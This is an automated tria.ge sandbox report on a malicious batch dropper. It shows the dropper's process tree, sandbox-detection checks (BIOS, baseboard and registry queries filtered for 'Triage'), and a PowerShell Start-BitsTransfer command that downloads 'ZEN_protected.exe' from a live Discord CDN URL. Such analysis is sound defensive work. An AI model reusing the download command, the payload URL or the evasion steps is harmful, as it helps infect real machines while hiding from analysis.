Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    118s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    05/10/2024, 04:09

General

  • Target

    O0JH5_NewTextDocument.bat

  • Size

    2KB

  • MD5

    1249778163d6bf686b1eb98029fc689b

  • SHA1

    eda466fb3713e0ef8887901036a82a0734b3d47e

  • SHA256

    96c4762d494abe04fa78c60d19af178d3a82ee7d75bda3be35d3ef1e5f1225ca

  • SHA512

    329774fc4a3a8acc91d4366a868323a53053c1e848c84445cadab6ac851df8dea57f16c9d877dd376611ae88c2ce9ea6fcaa970729c36f50859f77988b771a5b

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://cdn.discordapp.com/attachments/1291967647767859211/1291972588448514110/ZEN_protected.exe?ex=67020abc&is=6700b93c&hm=7b6c09bd4889de22214c218e9f6bd8b174172db46c5a7b2c5ca6d7b6793fe773

Signatures

  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 51 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\O0JH5_NewTextDocument.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2504
    • C:\Windows\System32\Wbem\WMIC.exe
      wmic bios get serialnumber
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2176
    • C:\Windows\system32\findstr.exe
      findstr /i "Triage"
      2⤵
        PID:2836
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic baseboard get manufacturer
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1196
      • C:\Windows\system32\findstr.exe
        findstr /i "Triage"
        2⤵
          PID:2632
        • C:\Windows\system32\reg.exe
          reg query "HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System" /v "SystemBiosVersion"
          2⤵
          • Checks BIOS information in registry
          PID:2412
        • C:\Windows\system32\findstr.exe
          findstr /i "Triage"
          2⤵
            PID:2684
          • C:\Windows\system32\reg.exe
            reg query "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum" /v "0"
            2⤵
            • Maps connected drives based on registry
            PID:2644
          • C:\Windows\system32\findstr.exe
            findstr /i "Triage"
            2⤵
              PID:2736
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c powershell -Command "(Get-WmiObject -Class Win32_ComputerSystem).Model"
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2752
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command "(Get-WmiObject -Class Win32_ComputerSystem).Model"
                3⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:2756
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo X9SRE/X9SRE-3F/X9SRi/X9SRi-3F "
              2⤵
                PID:2900
              • C:\Windows\system32\findstr.exe
                findstr /i "Triage"
                2⤵
                  PID:3032
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c powershell -Command "(Get-WmiObject -Class Win32_ComputerSystem).Name"
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2580
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command "(Get-WmiObject -Class Win32_ComputerSystem).Name"
                    3⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2676
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo BIGGY "
                  2⤵
                    PID:2708
                  • C:\Windows\system32\findstr.exe
                    findstr /i "Triage"
                    2⤵
                      PID:3040
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -Command "Start-BitsTransfer -Source 'https://cdn.discordapp.com/attachments/1291967647767859211/1291972588448514110/ZEN_protected.exe?ex=67020abc&is=6700b93c&hm=7b6c09bd4889de22214c218e9f6bd8b174172db46c5a7b2c5ca6d7b6793fe773' -Destination 'ZEN_protected.exe'"
                      2⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      PID:3044

                  Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                    Filesize

                    7KB

                    MD5

                    4b8cc7cba256bb98fd6c0dae545dd4ad

                    SHA1

                    d73cbccd88461bf789759b7b22214d87ce4dda75

                    SHA256

                    63e11e70471973b217dc96aeca897c22a01a3963f826574c0f013efcc7b019cc

                    SHA512

                    32f9b5e4198babfa918ed44b2288ac7a771788b884064f7dbc960797eb1ce2596483c5bbee03205641029b1a18bf33e12b29d69f8d24e5857f27b1071d90f466

                  • memory/2676-11-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

                    Filesize

                    2.9MB

                  • memory/2676-12-0x0000000002620000-0x0000000002628000-memory.dmp

                    Filesize

                    32KB

                  • memory/2756-4-0x000000001B610000-0x000000001B8F2000-memory.dmp

                    Filesize

                    2.9MB

                  • memory/2756-5-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

                    Filesize

                    32KB